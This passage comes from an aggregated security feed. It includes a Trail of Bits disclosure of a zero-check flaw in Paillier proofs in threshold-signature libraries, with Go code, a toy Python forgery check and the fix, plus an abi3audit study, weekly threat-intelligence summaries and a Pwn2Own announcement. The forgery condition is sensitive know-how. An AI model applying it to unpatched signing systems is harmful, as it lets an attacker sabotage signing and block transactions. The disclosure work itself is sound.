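mu = pow(L(pow(N + 1, lam, N2)), -1, N)   # decryption constant

def enc(x, r):
    # c = (N + 1)^x * r^N mod N^2, with r coprime to N
    return (pow(N + 1, x, N2) * pow(r, N, N2)) % N2

def dec(c):
    return (L(pow(c, lam, N2)) * mu) % N

r = secrets.randbelow(N - 2) + 2
while math.gcd(r, N) != 1:
    r = secrets.randbelow(N - 2) + 2
assert dec(enc(777, r)) == 777   # decryption recovers x
```

The additive homomorphism (multiplying ciphertexts adds plaintexts) is what makes Paillier useful inside threshold signing, and it is also why proving consistency between c and x matters.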
Bob then computes:

Finally, Bob computes a Fiat-Shamir challenge value e = Hash(N, Ñ, h1, h2, g, q, R, X, c, u, z, v, w) and the challenge response values:

Note that s1 and s2 are computed not modulo any value, but over the integers. Bob then sends Alice the proof π_PDL = [z, e, s, s1, s2].

Alice, upon receiving π_PDL, first checks that s1 ≤ q³; if this check fails, she rejects the proof as invalid. She then computes:

Finally, Alice computes:

If e ≠ ê, she rejects π_PDL as invalid. Otherwise, she accepts π_PDL as valid.

## Why it works

First, let’s make sure that a valid proof will validate:

Because û, v̂, and ŵ match u, v, and w (respectively), we will have ê = e, and the proof will validate. To understand how Bob is prevented from cheating, read this paper and section 6 of this paper.

## The code

The following code is taken from the kryptology library’s Paillier discrete log proof implementation. Specifically, the following code is used to compute v̂:

```go
func (p PdlProof) vHatConstruct(pv *PdlVerifyParams) (*big.Int, error) {
	// 5. \hat{v} = s^N . (N + 1)^s_1 . c^-e mod N^2
	// s^N . (N + 1)^s_1 mod N^2
	pedersenInc, err := inc(p.s1, p.s, pv.Pk.N)
	if err != nil {
		return nil, err
	}
	cInv, err := crypto.Inv(pv.C, pv.Pk.N2)
	if err != nil {
		return nil, err
	}
	cInvToE := new(big.Int).Exp(cInv, p.e, pv.Pk.N2)
	vHat, err := crypto.Mul(pedersenInc, cInvToE, pv.Pk.N2)
	if err != nil {
		return nil, err
	}
	return vHat, nil
}
```

The calling function, Verify, uses vHatConstruct to compute the v̂ value described above. In a valid proof, everything should work out just fine.

## The issue

In an invalid proof, things do not work out just fine. In particular, it is possible for Bob to set v = s = 0. When this happens, the value of c is irrelevant: Alice winds up checking that v̂ = 0^N·(N+1)^(s1)·c^(−e) = 0 = v, and accepts the result.
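A toy Python computation shows the collapse. The modulus and proof values below are illustrative; the variable names mirror the Go code:

```python
# When s = 0, vHat = s^N * (N+1)^s1 * c^(-e) mod N^2 is 0 for every invertible c.
p, q = 1019, 1367               # toy primes, for illustration only
N = p * q
N2 = N * N
s, s1, e = 0, 12345, 999        # forged proof values: s = 0 is the problem

for c in (17, 31337, N2 - 5):   # three arbitrary "ciphertexts" coprime to N^2
    c_inv = pow(c, -1, N2)      # crypto.Inv succeeds for any such c
    v_hat = (pow(s, N, N2) * pow(N + 1, s1, N2) * pow(c_inv, e, N2)) % N2
    assert v_hat == 0           # matches the forged v = 0, regardless of c
```

The zero factor s^N annihilates everything else in the product, so the check carries no information about c at all.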
## The second impossible thing: Arbitrary Ciphertexts

By exploiting the v̂ = s = 0 issue, Bob can prove that he knows x such that X = R^x, but simultaneously “prove” to Alice that any value c ≠ 0 is a valid ciphertext for x. Bob doesn’t even need to know the factorization of N. Once again, Bob has “proved” the impossible!

This forgery has real security implications. In particular, being able to forge this proof allows Bob to sabotage the threshold signature protocol without being detected. In some systems, this could be used to prevent valid transactions from being performed.

It is worth noting: the specific case of c = 0 will be detected as an error. The line cInv, err := crypto.Inv(pv.C, pv.Pk.N2) attempts to invert c modulo N². When c = 0, this function will return an error, causing the vHatConstruct function to return an error in turn.

## The fix

Again, this can be prevented by better input validation. Basic validation of the proof would involve checking that z and s are in Z*_N. That is, checking that gcd(z, N) = gcd(s, N) = 1, which forces z ≠ 0 and s ≠ 0. Additionally, there should be checks to ensure s1 ≠ 0 and s2 ≠ 0.

## Risks and disclosure

### The risk

These bugs were found in repositories that implement the GG20 threshold signature scheme. If attackers exploit the ciphertext malleability bug, they can “prove” the validity of invalid inputs to a group signature, leading to invalid signatures. If a particular blockchain relies on threshold signatures, this could allow an attacker to prevent targeted transactions from completing.

### Disclosure

We have reported the issues with tss-lib to Binance, who promptly fixed them. We have also reached out to numerous projects that rely on tss-lib (or, more commonly, forks of tss-lib). This includes ThorChain, who have also fixed the code; Joltify and SwipeChain rely directly on the ThorChain fork. Additionally, Keep Networks maintains their own fork of tss-lib; they have integrated fixes.
The issue with kryptology has been reported to Coinbase. The kryptology project on GitHub has since been archived. We were not able to identify any current projects that rely on the library’s threshold signature implementation.

## The moral of the story

In the end, this is a cryptographic failure stemming from a completely understandable data validation oversight. Values provided by another party should always be checked against all applicable constraints before being used. Heck, values computed from values provided by another party should always be checked against all applicable constraints. But if you look at mathematical descriptions of these ZK proofs, or even well-written pseudocode, where are these constraints spelled out? These documents describe the algorithms mathematically, not concretely. You see steps such as β ←$ Z*_N, followed later by v = (N + 1)^α·β^N (mod N²). From a mathematical standpoint, it’s understood that v is in Z*_(N²), and thus v ≠ 0. From a programming standpoint, though, there’s no explicit indication that there’s a constraint to check on v.

Trail of Bits maintains a resource guide for ZK proof systems at zkdocs.com. These types of issues are one of our primary motivations for such guidance—translating mathematical and theoretical descriptions into software is a difficult process. Admittedly, some of our own descriptions could explain these checks more clearly; we’re hoping to have that fixed in an upcoming release.

One piece of guidance that Trail of Bits likes to give auditors and cryptographers is to look out for two special values: 0 and 1 (as well as their analogues, like the point at infinity). Bugs related to 0 or its analogues have caused problems in the past (for instance, here and here). In this case, a failure to check for 0 leads to two separate bugs that allow attackers in a threshold signature scheme to lead honest parties down a rabbit hole.

##### ABI compatibility in Python: How hard could it be?

TL;DR: Trail of Bits has developed abi3audit, a new Python tool for checking Python packages for CPython application binary interface (ABI) violations. We’ve used it to discover hundreds of inconsistently and incorrectly tagged package distributions, each of which is a potential source of crashes and exploitable memory corruption due to undetected ABI differences. It’s publicly available under a permissive open source license, so you can use it today!

Python is one of the most popular programming languages, with a correspondingly large package ecosystem: over 600,000 programmers use PyPI to distribute over 400,000 unique packages, powering much of the world’s software.

The age of Python’s packaging ecosystem also sets it apart: among general-purpose languages, it is predated only by Perl’s CPAN. This, combined with the mostly independent development of packaging tooling and standards, has made Python’s ecosystem among the more complex of the major programming language ecosystems. Those complexities include:

• Two major current packaging formats (source distributions and wheels), as well as a smattering of domain-specific and legacy formats (zipapps, Python Eggs, conda’s own format, &c.);

• A constellation of different packaging tools and package specification files: setuptools, flit, poetry, and PDM, as well as pip, pipx, and pipenv for actually installing packages;

• …and a corresponding constellation of package and dependency specification files: pyproject.toml (PEP 518-style), pyproject.toml (Poetry-style), setup.py, setup.cfg, Pipfile, requirements.txt, MANIFEST.in, and so forth.

This post will cover just one tiny piece of Python packaging’s complexity: the CPython stable ABI. We’ll see what the stable ABI is, why it exists, how it’s integrated into Python packaging, and how each piece goes terribly wrong to make accidental ABI violations easy.

## The CPython stable API and ABI

Not unlike many other reference implementations, Python’s reference implementation (CPython) is written in C and provides two mechanisms for native interaction:

• A C Application Programming Interface (API), allowing C and C++ programmers to compile against CPython’s public headers and use any exposed functionality;

• An Application Binary Interface (ABI), allowing any language with C ABI support (like Rust or Golang) to link against CPython’s runtime and use the same internals

Developers can use the CPython API and ABI to write CPython extensions. These extensions behave exactly like ordinary Python modules but interact directly with the interpreter’s implementation details rather than the “high-level” objects and APIs exposed in Python itself.

CPython extensions are a cornerstone of the Python ecosystem: they provide an “escape hatch” for performance-critical tasks in Python, as well as enable code reuse from native languages (like the broader C, C++, and Rust packaging ecosystems).

At the same time, extensions pose a problem: CPython’s APIs change between releases (as the implementation details of CPython change), meaning that it is unsound, by default, to load a CPython extension into an interpreter of a different version. The implications of this unsoundness vary: a user might get lucky and have no problems at all, might experience crashes due to missing functions or, worst of all, experience memory corruption due to changes in function signatures and structure layouts.

To ameliorate the situation, CPython’s developers created the stable API and ABI: a set of macros, types, functions, and data objects that are guaranteed to remain available and forward-compatible between minor releases. In other words: a CPython extension built for CPython 3.7’s stable API will also load and function correctly on CPython 3.8 and forwards, but is not guaranteed to load and function with CPython 3.6 or earlier.

At the ABI level, this compatibility is referred to as “abi3”, and is optionally tagged in the extension’s filename: mymod.abi3.so, for example, designates a loadable stable-ABI-compatible CPython extension module named mymod. Critically, the Python interpreter does not do anything with this tag — it’s simply ignored.

This is the first strike: CPython has no notion of whether an extension is actually stable-ABI-compatible. We’ll now see how this compounds with the state of Python packaging to produce even more problems.

## CPython extensions and packaging

On its own, a CPython extension is just a bare Python module. To be useful to others, it needs to be packaged and distributed like all other modules.

With source distributions, packaging a CPython extension is straightforward (for some definitions of straightforward): the source distribution’s build system (generally setup.py) describes the compilation steps needed to produce the native extension, and the package installer runs these steps during installation.

For example, here’s how we define microx’s native extension (microx_core) using setuptools:

Distributing a CPython extension via source distribution has advantages and disadvantages:

API and ABI stability are non-issues: the package either builds during installation or it doesn’t and, when it does build, it runs against the same interpreter that it built against.

Source builds are burdensome for users: they require end-users of Python software to install the CPython development headers, as well as maintain a native toolchain corresponding to the language or ecosystem that the extension targets. That means requiring a C/C++ (and increasingly, Rust) toolchain on every deployment machine, adding size and complexity.

Source builds are fundamentally fragile: compilers and native dependencies are in constant flux, leaving end users (who are Python experts at best, not compiled language experts) to debug compiler and linker errors.

The Python packaging ecosystem’s solution to these problems is wheels. Wheels are a binary distribution format, which means that they can (but are not required to) provide pre-compiled binary extensions and other shared objects that can be installed as-is, without custom build steps. This is where ABI compatibility is absolutely essential: binary wheels are loaded blindly by the CPython interpreter, so any mismatch between the actual and expected interpreter ABIs can cause crashes (or worse, exploitable memory corruption).

Because wheels can contain pre-compiled extensions, they need to be tagged for the version(s) of Python that they support. This tagging is done with PEP 425-style “compatibility” tags: microx-1.4.1-cp37-cp37m-macosx_10_15_x86_64.whl designates a wheel that was built for CPython 3.7 on macOS 10.15 for x86-64, meaning that other Python versions, host OSes, and architectures should not attempt to install it.
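The tag triple can be pulled apart mechanically; a quick Python illustration using the filename from above (this naive split assumes no build tag and a dash-free project name — real tools use a proper parser):

```python
# A PEP 425-style wheel filename: {name}-{version}-{python}-{abi}-{platform}.whl
filename = "microx-1.4.1-cp37-cp37m-macosx_10_15_x86_64.whl"
name, version, py_tag, abi_tag, plat_tag = filename.removesuffix(".whl").split("-")
assert (py_tag, abi_tag, plat_tag) == ("cp37", "cp37m", "macosx_10_15_x86_64")

# An abi3 wheel swaps the ABI tag, promising stable-ABI compatibility:
abi3_name = "microx-1.4.1-cp37-abi3-macosx_10_15_x86_64.whl"
assert abi3_name.removesuffix(".whl").split("-")[3] == "abi3"
```

Installers compare these tags against the running interpreter to decide whether a wheel is acceptable; nothing ever checks that the binary inside actually matches them.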

On its own, this limitation makes wheel packaging for CPython extensions a bit of a hassle:

In order to support all valid combinations of {Python Version, Host OS, Host Architecture}, the packager must build a valid wheel for each. This means additional test, build, and distribution complexity, as well as exponential CI growth as a package’s support matrix expands.

Because wheels are (by default) tied to a single Python version, packagers are required to generate a new set of wheels on each Python minor version change. In other words: new Python versions start out without access to a significant chunk of the packaging ecosystem until packagers can play catch up.

This is where the stable ABI becomes critical: instead of building one wheel per Python version, packagers can build an “abi3” wheel for the lowest supported Python version. This comes with the guarantee that the wheel will work on all future (minor) releases, solving both the build matrix size problem and the ecosystem bootstrapping problem above.

Building an “abi3” wheel is a two-step process: the wheel is built locally (usually using the same build system as the source distribution) and then retagged with abi3 as the ABI tag rather than a single Python version (like cp37 for CPython 3.7).

Critically: neither of these steps is validated, because Python’s build tools have no good way to validate them. This leaves us with the second and third strikes:

• To correctly build a wheel against the stable API and ABI, the build needs to set the Py_LIMITED_API macro to the intended CPython support version (or, for Rust with PyO3, to use the correct build feature). This prevents Python’s C headers from using non-stable functionality or potentially inlining incompatible implementation details.

For example, to build a wheel as cp37-abi3 (stable ABI for CPython 3.7+), the extension needs to either #define Py_LIMITED_API 0x03070000 in its own source code, or use the setuptools.Extension construct’s define_macros argument to configure it. These are easy to forget, and produce no warning when forgotten!

Additionally, when using setuptools, the packager may choose to set py_limited_api=True. But this does not enable any actual API restrictions; it merely adds the .abi3 tag to the built extension’s filename. As you’ll recall, this tag is not currently checked by the CPython interpreter, so this is effectively a no-op.

Critically, it does not affect the actual wheel build. The wheel is built however the underlying setuptools.Extension sees fit: it might be completely right, it might be a little wrong (stable ABI, but for the wrong CPython version), or it might be completely wrong.
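Concretely, a build that really targets cp37-abi3 needs both knobs set at once; the following is a sketch using setuptools, with illustrative module and file names:

```python
from setuptools import Extension

# Both knobs are needed: define_macros genuinely restricts the C API used at
# compile time, while py_limited_api=True only adds the .abi3 filename tag.
ext = Extension(
    "mymod",
    sources=["mymod.c"],                                 # illustrative path
    define_macros=[("Py_LIMITED_API", "0x03070000")],    # stable ABI for 3.7+
    py_limited_api=True,
)
```

Setting only py_limited_api=True produces a confidently mis-tagged wheel, which is precisely the failure mode this article measures.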

This breakdown happens because of the devolved nature of Python packaging: the code that builds extensions is in pypa/setuptools, while the code that builds wheels is in pypa/wheel — two completely separate codebases. Extension building is designed as a black box, a fact that Rust and other language ecosystems take advantage of (there is no Py_LIMITED_API macro to sensibly define in a PyO3-based extension — it’s all handled separately by build features).

To summarize:

• Stable ABI (“abi3”) wheels are the only reliable way to package native extensions without a massive build matrix.

• However, none of the dials that control abi3-compatible wheel building talk to each other: it’s possible to build an abi3-compatible wheel without tagging it as such, to build a non-abi3 wheel and tag it incorrectly as compatible, or to tag an abi3-compatible wheel as compatible with the wrong CPython version.

• Consequently, the correctness of the current abi3-compatible wheel ecosystem is suspect. ABI violations are capable of causing crashes and even exploitable memory corruption, so we need to quantify the current state of affairs.

## How bad is it, really?

This all seems pretty bad, but it’s just an abstract problem: it’s entirely possible that every Python packager gets their wheel builds right, and hasn’t published any incorrectly tagged (or completely invalid) abi3-style wheels.

To get a sense for how bad things really are, we developed abi3audit. Abi3audit’s entire raison d’être is finding these kinds of ABI violation bugs: it scans individual extensions, Python wheels (which can contain multiple extensions), and entire package histories, reporting back anything that doesn’t match the specified stable ABI version or is entirely incompatible with the stable ABI.

To get a list of auditable packages to feed into abi3audit, I used PyPI’s public BigQuery dataset to generate a list of every abi3-wheel-containing package downloaded from PyPI in the last 21 days:

```sql
#standardSQL
SELECT DISTINCT file.project
FROM `bigquery-public-data.pypi.file_downloads`
WHERE file.filename LIKE '%abi3%'
  -- Only query the last 21 days of history
  AND DATE(timestamp)
    BETWEEN DATE_SUB(CURRENT_DATE(), INTERVAL 21 DAY)
    AND CURRENT_DATE()
```


(I chose 21 because I blew through my BigQuery quota while testing. It’d be interesting to see the full list of downloads over a year or the entire history of PyPI, although I’d expect diminishing returns.)

From that query, I got 357 packages, which I’ve uploaded as a GitHub Gist. With those packages saved, a JSON report from abi3audit was only a single invocation away:

The JSON from that audit is also available as a GitHub Gist.

First, some high-level statistics:

• Of the 357 initial packages queried from PyPI, 339 actually contained auditable wheels. Some were 404s (presumably created and then deleted), while others were tagged with abi3 but did not actually contain any CPython extension modules (which does, technically, make them abi3 compatible!). A handful of these were ctypes-style modules, with either a vendored library or code to load a library that the host was expected to contain.

• Those 339 remaining packages had a total of 13650 abi3-tagged wheels between them. The largest (in terms of wheels) was eclipse-zenoh-nightly, with 1596 wheels (or nearly 12 percent of all abi3-tagged wheels on PyPI).

• The 13650 abi3-tagged wheels had a total of 39544 shared objects, each a potential Python extension, between them. In other words: the average abi3-tagged wheel has 2.9 shared objects in it, each of which was audited by abi3audit.

• Attempting to parse each shared object in each abi3-tagged wheel produced all kinds of curious results: plenty of wheels contained invalid shared objects: ELF files that began with garbage (but contained a valid ELF later in the file), temporary build artifacts that weren’t cleaned up, and a handful of wheels that appeared to contain editor-style swap files for hand-modified binaries. Unfortunately, unlike Moyix, we did not discover any catgirls.

Now, the juicy parts:

Of the 357 valid packages, 54 (15 percent) contained wheels with ABI version violations. In other words: roughly one in six packages had wheels that claimed support for a particular Python version, but actually used the ABI of a newer Python version.

More severely: of those same 357 valid packages, 11 (3.1 percent) contained outright ABI violations. In other words: roughly one in thirty packages had wheels that claimed to be stable ABI compatible, but weren’t at all!

In total, 1139 (roughly 3 percent) Python extensions had version violations, and 90 (roughly 0.2 percent) had outright ABI violations. This suggests two things: that the same packages tend to have ABI violations across multiple wheels and extensions, and that multiple extensions within the same wheel tend to have ABI violations at the same time (which makes sense, since they should share the same build).

Here are some that we found particularly interesting:

#### PyQt6 and sip

PyQt6 and sip are both part of the Qt project, and both had ABI version violations: multiple wheels were tagged for CPython 3.6 (cp36-abi3), but used APIs that were only stabilized with CPython 3.7.

sip additionally had a handful of wheels with outright ABI violations, all from the internal _Py_DECREF API:

#### refl1d

refl1d is a NIST-developed reflectometry package. They did a couple of releases tagged for the stable ABI of Python 3.2 (the absolute lowest), while actually targeting the stable ABI of Python 3.11 (the absolute highest — not even released yet!).

#### hdbcli

hdbcli appears to be a proprietary client for SAP HANA, published by SAP themselves. It’s tagged as abi3, which is cool! Unfortunately, it isn’t actually abi3-compatible:

This, again, suggests building without the correct macros. We’d be able to figure out more with the source code, but this package appears to be completely proprietary.

#### gdp and pifacecam

These are two smaller packages, but they piqued my interest because both had stable ABI violations that weren’t just the reference/counting helper APIs:

#### dockerfile

Finally, I liked this one because it turns out to be a Python extension written in Go, not C, C++, or Rust!

The maintainer had the right idea, but didn’t define Py_LIMITED_API to any particular value. So Python’s headers “helpfully” interpreted that as not limited at all:

## The path forward

First, the silver lining: most of the extremely popular packages in the list had no ABI violations or version mismatches. Cryptography and bcrypt were spared, for example, indicating strong build controls on their side. Other relatively popular packages had version violations, but they were generally minor (for example: expecting a function that was only stabilized with 3.7, but has been present and the same since 3.3).

Overall, however, these results are not great: they indicate (1) that a significant portion of the “abi3” wheels on PyPI aren’t really abi3-compatible at all (or are compatible with a different version than they claim), and (2) that maintainers don’t fully understand the different knobs that control abi3 tagging (and that those knobs do not actually modify the build itself).

More generally, the results point to a need for better controls, better documentation, and better interoperation between Python’s different packaging components. In nearly all cases, the package’s maintainer has attempted to do the right thing, but seemingly wasn’t aware of the additional steps necessary to actually build an abi3-compatible wheel. In addition to improving the package-side tooling here, the auditing is also automatable: we’ve designed abi3audit in part to demonstrate that it would be possible for PyPI to catch these kinds of wheel errors before they become a part of the public index.

##### We’re streamers now

Over the years, we’ve built many high-impact tools that we use for security reviews. You might know some of them, like Slither, Echidna, Amarna, Tealer, and test-fuzz. All of our tools are open source, and we love seeing the community benefit from them. But mastering our tools takes time and practice, and it’s easier if someone can guide you. To that end, we have created several tutorials (see building-secure-contracts) and frequently host training sessions at conferences. Now we’re going one step further: we’re live-streaming workshops on Twitch and YouTube.

During our streams, Trail of Bits engineers will describe each of our tools in depth, giving users an inside look at the underlying technology and how they can use the tools in their own work. We will focus on providing hands-on experience, with real-world exercises, and answer common questions about the tools.

## First up: 6-part series on fuzzing smart contracts

We’ll share detailed technical presentations on fuzzing smart contracts, and guide attendees to write invariants for them in our first six workshops. Engineers will go over fuzzer setup, how to identify invariants—from simple to complex—and how to translate these invariants into code.

The workshops will be held on the following dates:

Building secure contracts: Learn how to fuzz like a pro

• Wednesday, November 16 (12pm ET): Introduction to fuzzing (Anish Naik)
• Tuesday, November 22: Fuzzing arithmetics (Anish Naik)
• Wednesday, November 30: Intro to AMM’s invariants (Justin Jacob)
• Tuesday, December 6: AMM fuzzing (Justin Jacob)
• Wednesday, December 14: Intro to advanced DeFi’s invariants (Nat Chin)
• Wednesday, December 21: Advanced DeFi invariants (Nat Chin)

You’re welcome to get familiar with our smart contract fuzzer, Echidna, before the workshop. However, it’s not a requirement: the first sessions will cover the basics, while subsequent sessions will be more advanced.

Each session will be interactive, with hosts available to answer questions as they come in from the livestream chat.

## More workshops on the way

We’re all about fuzzing, but we think our static analysis tools are pretty cool, too. In 2023, our livestream workshops will cover Slither, our static analysis tool for Solidity. We are also planning sessions that cover other tools from our catalog, such as our static analyzer and linter for Circom (Circomspect), our privacy testing library for deep learning systems (PrivacyRaven), and our interactive documentation on zero-knowledge proof systems and related primitives (ZKDocs). Let us know which tools and topics you’d like us to stream about, and we’ll see you on stream!

### Check Point Research

Retrieved title: Check Point Research, 3 item(s)
##### 28th November– Threat Intelligence Report

For the latest discoveries in cyber research for the week of 28th November, please download our Threat Intelligence Bulletin.

Top Attacks and Breaches

• The European Parliament website has been attacked following a vote declaring Russia a state sponsor of terrorism. The pro-Russian hacktivist groups Anonymous Russia and Killnet, have claimed responsibility for the attack, causing an ongoing DDoS (Distributed Denial of Service).
• Ukrainian organizations have been the victims of ransomware attacks that have been linked to the Russian military cyber-espionage group Sandworm (tracked by Microsoft as IRIDIUM). The group has used a new malware dubbed ‘RansomBoggs’, distributed by a PowerShell script from the domain controller. ‘RansomBoggs’ encrypts files using AES-256 in CBC mode with a random key, and adds a ‘.chsch’ extension to the encrypted files.
• The Ragnar Locker ransomware gang has published stolen data belonging to Zwijndrecht police, a local police unit in Antwerp, Belgium. The data, which was initially attributed to the municipality of Zwijndrecht, contains a large amount of personal information including thousands of car plate numbers, fines, crime report files, investigation reports, and more.
• The Sports betting company DraftKings has been breached, causing the loss of approximately $300K of funds from active user accounts. The threat actors managed to change user passwords, and enabled two-factor authentication on a different phone number which led them to gain personal bank account information. • Several American colleges, including Cincinnati State College, have been the victims of ransomware attacks over the Thanksgiving holiday. The threat actors shut down the colleges’ financial aid services, network printing, VPN tools, admission application platforms, transcript exchanges, grading tools and more. Ransomware attacks targeting educational institutions are a part of on-going recently observed trend. Check Point Threat Emulation provides protection against this threat (Trojan.Win.ViceSociety.*) • Black Basta ransomware group is running a campaign targeting organizations in the United States, Canada, United Kingdom, Australia, and New Zealand. The group uses QakBot (AKA QBot, Pinkslipbot) banking Trojan to infect an environment and install a backdoor allowing it to drop the ransomware. Successful exploitation will allow the ransomware group to steal victims’ financial data, including browser information, keystrokes, and credentials. Check Point Threat Emulation provides protection against this threat (Trojan.Wins.Qbot; Banker.Wins.Qbot) Vulnerabilities and Patches • Google has released an update for the Chrome web browser to patch a new, actively exploited zero-day vulnerability. Tracked as CVE-2022-4135, the vulnerability resides in the GPU component, as a heap-based buffer overflow bug that could be used to crash a program or execute arbitrary code, leading to unintended behavior. • Researchers have observed a recently patched SQL injection vulnerability in Zoho ManageEngine products. 
Tracked as CVE-2022-40300, the flaw lets threat actors send a crafted request to the target server, which could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges.
• Microsoft has tied an attack on seven facilities managing the electricity grid in Northern India to a vulnerable component, the Boa web server, used by vendors across a variety of IoT devices and popular software development kits (SDKs). Successful exploitation could allow attackers to silently gain access to networks by collecting information from files.

Threat Intelligence Reports

• Researchers have investigated the Luna Moth ransomware campaign, which has extorted hundreds of thousands of dollars from several victims in the legal and retail sectors by using callback phishing and telephone-oriented attack delivery (TOAD).
• A technical analysis of a new Go-based information stealer named ‘Aurora’ has been published. The malware steals sensitive information from browsers and cryptocurrency apps, exfiltrates data directly from disks, and loads additional payloads.
• Researchers dived into a new ransomware tool called ‘AXLocker’, which encrypts several file types and makes them unusable, steals Discord tokens from the victim’s machine, and demands a ransom payment to recover the encrypted files. Check Point Threat Emulation provides protection against this threat (Ransomware.Win.TouchTrapFiles.A)
• Researchers have discovered a new variant of the ‘RansomExx’ ransomware, primarily designed to run on the Linux operating system. The ransomware, operated by the DefrayX threat actor group, encrypts files using AES-256, with RSA used to protect the encryption keys. Check Point Threat Emulation provides protection against this threat (Ransomware.Wins.Ransomexx)
• An information-stealing Google Chrome browser extension named ‘VenomSoftX’ is being deployed by Windows malware to steal cryptocurrency and clipboard contents as users browse the web.
The Chrome extension is being installed by the ViperSoftX Windows malware, which acts as a JavaScript-based RAT and cryptocurrency hijacker.

The post 28th November– Threat Intelligence Report appeared first on Check Point Research.

##### 21st November– Threat Intelligence Report

For the latest discoveries in cyber research for the week of 21st November, please download our Threat Intelligence Bulletin.

Top Attacks and Breaches

• US CISA has discovered nation-state threat activity affecting an American federal government entity. The attackers, whom CISA assesses to be Iran-sponsored, exploited the 2021 ‘Log4Shell’ vulnerability in an unpatched server to gain initial access. Afterwards, the attackers deployed a cryptocurrency miner, harvested credentials, and employed various techniques to move laterally and establish persistence in the network. Check Point IPS provides protection against this threat (Apache Log4j Remote Code Execution (CVE-2021-44228; CVE-2021-45046))
• Check Point warns of increased scam and phishing activity targeting shoppers during the holiday season. Hackers and scammers are exploiting the boom in online sales during the Thanksgiving period to lure in as many potential victims as possible.
• The FBI, alongside CISA and additional agencies, has published a security advisory regarding the Hive ransomware group. According to the FBI, Hive has ransomed over 1,300 organizations for a total of $100M in the past 18 months, focusing on targets in the healthcare industry.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Hive.A; Ransomware.Wins.Hive.ta.B)

• The Russian government-affiliated hacktivist group Killnet has launched denial of service attacks against the White House website, as well as the satellite internet communication corporation Starlink which has been used by Ukraine. Killnet claims that the attack has successfully taken down the websites.
• Multiple groups have been exploiting a vulnerability in Adobe Commerce and Magento to gain access to online stores. The attacks, which have risen in volume towards the holiday season, allow the threat actors to gain permanent remote access to the online stores.

Check Point IPS provides protection against this threat (Adobe Commerce Command Injection (CVE-2022-24086))

• Meta has fired dozens of employees, after the employees had received thousands of dollars in bribes from outside hackers in return for granting access to users’ Facebook or Instagram profiles. The employees used the company’s internal support tool, which allows full access to any user account.
• In Michigan, schools in two counties were forced to suspend operations due to a ransomware attack. The threat actor behind the attack is not yet known.

Vulnerabilities and Patches

• Researchers have discovered a critical severity vulnerability affecting Spotify’s open source Backstage platform, which is being used by a large number of companies worldwide. The vulnerability could allow a threat actor to gain remote code execution, and was patched by the Spotify Backstage team.
• Samba has patched vulnerabilities in several versions of their software. In certain cases, the vulnerabilities could allow an attacker to gain control of affected systems.
• Atlassian has released patches for critical severity vulnerabilities discovered in Atlassian Crowd Server and in Atlassian Bitbucket. Both vulnerabilities could allow an attacker to gain remote access to an unpatched system.
• F5 has published a security advisory regarding a vulnerability affecting its BIG-IP and BIG-IQ products, which could allow an attacker to gain access to an affected system after fulfilling certain requirements.

Threat Intelligence Reports

• Researchers have detected modifications made to the DTrack malware, which is being utilized by the North Korean APT group Lazarus. The malware includes spying tools such as keylogging and screenshotting, and also allows injection and exfiltration of files. Recently, the group has expanded its range of operations, and has been observed targeting entities in Europe and Latin America.

Check Point Threat Emulation provides protection against this threat (RAT.Win32.Dtrack; InfoStealer.Wins.Dtrack.A)

• An analysis of Emotet’s latest comeback has been published. After being inactive since July, Emotet campaigns have been detected in large volume in November. According to researchers, the threat actors have made multiple modifications to the malware, including to the end-stage payload which can now also drop the IcedID and Bumblebee malware variants.

• Researchers have analyzed the activity of the state-sponsored group dubbed Billbug, likely attributed to China. The group has targeted governments, defense agencies and a certificate authority, all based in Asia. According to the researchers, the motivation behind the attacks was data theft.
• A new botnet targeting Linux IoT devices has been discovered. The attackers attempt to gain access to devices via brute-forcing commonly used default passwords. According to the analysis, the goal of the botnet is to DDoS popular game servers.
• Researchers warn against cyberattacks leveraging the FIFA World Cup to lure victims in phishing attacks.

The post 21st November– Threat Intelligence Report appeared first on Check Point Research.

##### The New Face of Hacktivism

For decades, hacktivism has been associated with groups like Anonymous. Recently, though, something has changed. An entirely new kind of hacktivist has arisen: one with more resources, capabilities and power than anything we’ve seen before.

The post The New Face of Hacktivism appeared first on Check Point Research.

### Zero Day Initiative

Retrieved title: Zero Day Initiative - Blog, 3 item(s)
##### Pwn2Own Returns to Miami Beach for 2023

Welcome back to Miami!

Even as we make our final preparations for our consumer-focused contest in Toronto, we’re already looking ahead to warmer climes and returning to the S4 Conference in Miami for our ICS/SCADA-themed event. Pwn2Own returns to South Beach on February 14-16, 2023, and for this year’s event, we’ve refined our target list to include the latest trends in the ICS world. As we did last year, we’ll have contestants both in person and around the world demonstrating the latest exploits on OPC Unified Architecture (OPC UA) Servers, OPC UA Clients, Data Gateways, and Edge systems.

Our inaugural Pwn2Own Miami was held back in January 2020 at the S4 Conference, and we had a fantastic time as we awarded over $280,000 USD in cash and prizes for 24 unique 0-day vulnerabilities. Last year, we awarded $400,000 for 26 unique 0-days (plus a few bug collisions). At that event, we crowned Daan Keuper (@daankeuper) and Thijs Alkemade (@xnyhps) from Computest Sector 7 (@sector7_nl) Master of Pwn for their multiple successful exploits. We’ll see if they return in 2023 to defend their crown.

This contest is not possible without the participation and help of our partners within the ICS community, and we would like to especially thank the folks at the OPC Foundation and AVEVA for their expertise and guidance. The cooperation of those within the ICS/SCADA community is essential in ensuring we have the right categories and targets. Pwn2Own Miami seeks to harden these platforms by revealing vulnerabilities and providing that research to the vendors. The goal is always to get these bugs fixed before they’re actively exploited by attackers. ICS vendors have been instrumental in making that goal a reality.

The 2023 edition of Pwn2Own Miami has four categories:

·      OPC Unified Architecture (OPC UA) Server
·      OPC Unified Architecture (OPC UA) Client
·      Data Gateway
·      Edge systems

You’ll notice these are different categories from previous years. These differences reflect the changing state of the ICS industry and better reflect current threats to SCADA systems. Let’s look at the details of each category.

OPC UA Server Category

The OPC Unified Architecture (UA) is a platform-independent, service-oriented architecture that integrates all the functionality of the individual OPC Classic specifications into one extensible framework. OPC UA serves as the universal translator protocol in the ICS world. It is used by almost all ICS products to send data between disparate vendor systems. While we’ve had OPC UA targets in the past, for this event, we’ve set up distinct Server and Client categories.

An attempt in this category must be launched against the target’s exposed network services from the contestant’s laptop within the contest network. An entry in the category must result in either a denial-of-service condition, arbitrary code execution, credential theft, or a bypass of the trusted application check.

